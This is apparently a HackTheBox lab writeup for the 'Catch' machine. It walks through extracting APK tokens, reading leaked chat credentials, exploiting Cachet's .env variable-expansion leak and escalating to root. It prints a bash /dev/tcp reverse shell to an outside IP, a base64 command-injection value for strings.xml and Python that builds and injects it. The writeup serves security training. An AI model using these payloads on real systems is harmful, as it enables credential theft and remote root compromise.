Catch – HackTheBox Writeup

Machine Name: Catch
IP: 10.10.11.150
Difficulty: Medium
Summary
Catch is a machine that requires reverse engineering an Android APK, enumerating the decompiled files and finding hard-coded API tokens. One token gives API access to a Let's Chat instance whose messages leak credentials for a Cachet dashboard. Cachet is vulnerable to a configuration leak that exposes the database credentials, which are reused for SSH and give us the user shell. Privilege escalation involves monitoring processes and finding a script, run by root, that extracts a value from an APK and executes it, so a command injected into that value runs as root.
Information Gathering
The Nmap scan shows four open ports: 22 (SSH), 80 (Apache 2.4.41), 3000 (Gitea) and 8000 (Apache 2.4.29). I also added “catch.htb” to the hosts file.
“catch.htb” is the home page of Catch Global Systems. The page tells us that “Lets-chat/Gitea” integration will be included in the future enhancements.
By clicking the “Download Now” button, we get an APK named “catchv1.0.apk”.
Navigating to “catch.htb:3000/” shows the Gitea page, whose footer tells us the version is 1.14.1.
We can get the same information from the manifest that nmap returned for port 3000; it is base64-encoded.
I added “gitea.catch.htb:3000” to the hosts file and navigating to it shows the same page as “catch.htb:3000/”.
The obvious lead here is the APK file, so I went ahead and installed it in the Nox emulator. It only showed an error message.
Enumeration also turned up another sub-domain, “https://status.catch.htb/”. After adding it to the hosts file and navigating to it, the page was the same as “catch.htb/”.
“status.catch.htb:5000/” redirects us to a login page for Let’s Chat, “http://status.catch.htb:5000/login”.
Next, I analysed the APK file with MobSF and found some tokens under “Reconnaissance > Hardcoded Secrets”.
Enumerating further, I found that “http://status.catch.htb:8000/” is running Cachet.
I looked up the Let’s Chat API on GitHub and found that the authentication token is sent as a bearer token. I captured a request to “status.catch.htb:5000/” in Burp and added an “Authorization: Bearer <token>” header.
We can then request “/rooms”, as documented in the Let’s Chat API.
The response lists three rooms. We can now request the messages of each room (“/rooms/<room id>/messages”). There was a conversation about adding SSL, and one user sends credentials in the chat!
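The room and message walk described above, as an added example that is not part of the original writeup. It sends the token as a bearer header, lists the rooms, pulls each room's messages and flags the ones that look like they carry credentials. The base URL, the response field names (taken from the Let's Chat API documentation) and the sample data are assumptions; the sample rooms and messages are constructed and contain no data from the box.

```python
import json
import re
import urllib.request

# Assumed target; the token comes from the APK (MobSF) and is passed in, never hard-coded.
BASE_URL = "http://status.catch.htb:5000"


def auth_headers(token: str) -> dict:
    """Let's Chat accepts the API token as an HTTP bearer token."""
    return {"Authorization": f"Bearer {token}", "Accept": "application/json"}


def fetch_json(path: str, token: str, base_url: str = BASE_URL):
    """GET base_url + path with the bearer header and decode the JSON body (network call)."""
    req = urllib.request.Request(base_url + path, headers=auth_headers(token))
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.loads(resp.read().decode())


def room_index(rooms) -> list:
    """Reduce the GET /rooms response to (id, slug, name) tuples."""
    return [(r["id"], r.get("slug", ""), r.get("name", "")) for r in rooms]


# Words that usually accompany a credential drop in chat; tune for the target.
CRED_HINT = re.compile(r"(?i)\b(pass(word|wd)?|creds?|credentials|login|username|token)\b")


def credential_messages(messages) -> list:
    """Return (owner, text) for every message whose text looks credential-related."""
    hits = []
    for m in messages:
        text = m.get("text", "")
        if CRED_HINT.search(text):
            hits.append((m.get("owner", "?"), text))
    return hits


def dump_all_rooms(token: str, base_url: str = BASE_URL) -> dict:
    """Walk GET /rooms, then GET /rooms/<id>/messages for each room (network call)."""
    found = {}
    for room_id, slug, _name in room_index(fetch_json("/rooms", token, base_url)):
        hits = credential_messages(fetch_json(f"/rooms/{room_id}/messages", token, base_url))
        if hits:
            found[slug or room_id] = hits
    return found


# Constructed sample data shaped like the Let's Chat API responses (field names assumed).
SAMPLE_ROOMS = [
    {"id": "r1", "slug": "announcements", "name": "Announcements"},
    {"id": "r2", "slug": "status", "name": "Status"},
    {"id": "r3", "slug": "devops", "name": "DevOps"},
]
SAMPLE_MESSAGES = [
    {"owner": "u1", "room": "r2", "text": "We should add SSL to the status page before launch."},
    {"owner": "u2", "room": "r2", "text": "Agreed. Status dashboard creds: user john, pass Example!Pass123 (constructed)"},
    {"owner": "u1", "room": "r2", "text": "Thanks, will do."},
]

if __name__ == "__main__":
    # Offline demonstration on the constructed data; dump_all_rooms(token) does the live walk.
    print(room_index(SAMPLE_ROOMS))
    print(credential_messages(SAMPLE_MESSAGES))
```

The filter only narrows three rooms of chatter down to the messages worth reading by hand; on a real engagement, read the whole conversation around every hit, since the password often arrives one message after the word "password".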
These credentials worked on the “status.catch.htb:8000/” login page.
It presented the Cachet dashboard. Whenever I get access to a dashboard, I look for settings and features that allow me to run code. There wasn’t any such page, but the log at Settings > Log shows that the application runs on the Laravel PHP framework and that the Cachet version is 2.4.0-dev.
With the name of the box being “Catch”, this must be the way to getting a shell.
Gaining User Shell
Googling “cachet 2.4.0-dev exploit”, the first result was helpful. The vulnerability is a configuration leak: the mail settings form persists its values into the application’s “.env” file, and the “Mail from Host” value is read back from that file and displayed. Because the dotenv loader expands references to other environment variables when it loads the file, a payload that references a secret variable is displayed expanded, so we can read credentials out of the configuration. The PoC is simple: save the payload in the “Mail from Host” field, refresh the page and read the same field.
Using “$DB_USERNAME” as the payload, the field comes back as the database user, “Will”. (If the bare form is not expanded, use “${DB_USERNAME}”; the braced form is the nested-variable syntax phpdotenv documents.)
Let’s grab the password as well, using the payload “$DB_PASSWORD”.
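To make the leak concrete, here is an added model of the vulnerable flow and a hardened variant. It is illustration code written for this writeup, not Cachet's or Laravel's source: a settings write persists a field into a .env-style text, a dotenv-style loader expands ${VAR} references, and the stored field is reflected back to the user. The .env contents are constructed placeholders, not the box's real secrets.

```python
import re

# Constructed .env standing in for the application's configuration file (placeholder values).
ENV_FILE = """APP_ENV=production
DB_USERNAME=will
DB_PASSWORD=Placeholder!Pass
MAIL_HOST=localhost
"""

# ${VAR} nested-variable syntax; a loader that also expanded bare $VAR would leak the same way.
NESTED = re.compile(r"\$\{([A-Za-z0-9_]+)\}")


def write_setting(env_text: str, key: str, value: str) -> str:
    """Model of a settings form persisting one field: replace KEY=... in place or append it."""
    lines = env_text.splitlines()
    new_line = f"{key}={value}"
    for i, line in enumerate(lines):
        if line.split("=", 1)[0] == key:
            lines[i] = new_line
            break
    else:
        lines.append(new_line)
    return "\n".join(lines) + "\n"


def load_env(env_text: str) -> dict:
    """Model of a dotenv loader: parse KEY=VALUE lines, then expand ${OTHER} references."""
    env = {}
    for line in env_text.splitlines():
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        env[key.strip()] = value.strip()
    for _ in range(2):  # second pass resolves references to keys defined later in the file
        for key, value in env.items():
            env[key] = NESTED.sub(lambda m: env.get(m.group(1), ""), value)
    return env


def reflected_value(env_text: str, field: str, payload: str) -> str:
    """Vulnerable flow: save the payload, reload the configuration, display the field."""
    return load_env(write_setting(env_text, field, payload))[field]


def reflected_value_hardened(env_text: str, field: str, payload: str) -> str:
    """Hardened flow: a mail host never legitimately contains '$', so reject it before it hits .env."""
    if "$" in payload:
        raise ValueError("variable references are not allowed in settings values")
    return reflected_value(env_text, field, payload)


if __name__ == "__main__":
    for payload in ("${DB_USERNAME}", "${DB_PASSWORD}"):
        print(payload, "->", reflected_value(ENV_FILE, "MAIL_HOST", payload))
```

The point the model makes is that the secret never has to be rendered on its own page: any field that is written to the same file the loader interpolates, and later echoed back, is a read primitive for every other variable in that file.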
The credentials worked for the open SSH port and I could capture the user flag.
Privilege Escalation
I ran “sudo -l” first and found no commands that Will could run as root. LinPEAS didn’t find anything useful for escalating privileges either. I then ran “pspy64” to monitor processes and found a script named “verify.sh” running as root.
Taking a closer look at the script, we find that its “app_check” function retrieves a value from the APK’s “/res/values/strings.xml” file and executes it. We can inject a reverse shell payload into that value.
First, I decompiled the APK with apktool (“apktool d catchv1.0.apk”).
Next, I base64-encoded a bash reverse shell payload, “/bin/bash -l > /dev/tcp/10.10.16.22/1234 0<&1 2>&1”. Encoding it keeps the “<”, “>” and “&” characters, which are special in XML, out of strings.xml.
Then I replaced the “app_name” string in “catchv1.0/res/values/strings.xml” with the command that decodes and runs the payload, keeping “Catch” in front of it:
<string name="app_name">Catch;echo -n "L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTYuMjIvMTIzNCAwPCYxIDI+JjE="|base64 -d|bash -i </string>
To rebuild the folder into an APK, the apktool binary shipped with Kali did not work for me; the “apktool_2.6.1.jar” release does (“java -jar apktool_2.6.1.jar b catchv1.0”).
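The payload preparation from the steps above, as an added example that is not part of the original writeup: it builds the same base64-encoded reverse shell, wraps it in the "Catch;echo -n ...|base64 -d|bash -i" form used above, and patches the app_name string in a decompiled strings.xml without disturbing the rest of the file. The sample strings.xml is a constructed stand-in for the file apktool produces; the attacker IP and port are parameters.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed stand-in for res/values/strings.xml from the decompiled APK.
SAMPLE_STRINGS_XML = """<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">Catch</string>
    <string name="title_activity_main">MainActivity</string>
</resources>
"""

XML_SPECIAL = set("<>&")


def reverse_shell_command(lhost: str, lport: int) -> str:
    """The bash /dev/tcp reverse shell that gets base64-encoded."""
    return f"/bin/bash -l > /dev/tcp/{lhost}/{lport} 0<&1 2>&1"


def build_app_name(lhost: str, lport: int, original: str = "Catch") -> str:
    """Original name, then a ';' and a command that decodes and runs the payload."""
    cmd = reverse_shell_command(lhost, lport)
    assert XML_SPECIAL & set(cmd), "raw command carries XML metacharacters, hence the encoding"
    b64 = base64.b64encode(cmd.encode()).decode()
    assert not (XML_SPECIAL & set(b64))  # the base64 alphabet never contains < > &
    return f'{original};echo -n "{b64}"|base64 -d|bash -i'


def read_app_name(xml_text: str):
    """Return the app_name string value, or None if the resource is missing."""
    root = ET.fromstring(xml_text)
    for s in root.iter("string"):
        if s.get("name") == "app_name":
            return s.text
    return None


def inject_app_name(xml_text: str, new_value: str) -> str:
    """Rewrite only the app_name string; other resources and whitespace are preserved."""
    root = ET.fromstring(xml_text)
    for s in root.iter("string"):
        if s.get("name") == "app_name":
            s.text = new_value
            break
    else:
        raise ValueError("app_name string not found")
    return '<?xml version="1.0" encoding="utf-8"?>\n' + ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    # Replace the sample with open("catchv1.0/res/values/strings.xml").read() on a real run.
    patched = inject_app_name(SAMPLE_STRINGS_XML, build_app_name("10.10.16.22", 1234))
    print(patched)
```

ElementTree escapes only "&", "<" and ">" in text nodes, so the double quotes around the base64 blob survive the round trip; that is why the encoded form can be dropped into the XML while the raw /dev/tcp redirection cannot.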
Pwned! Got root!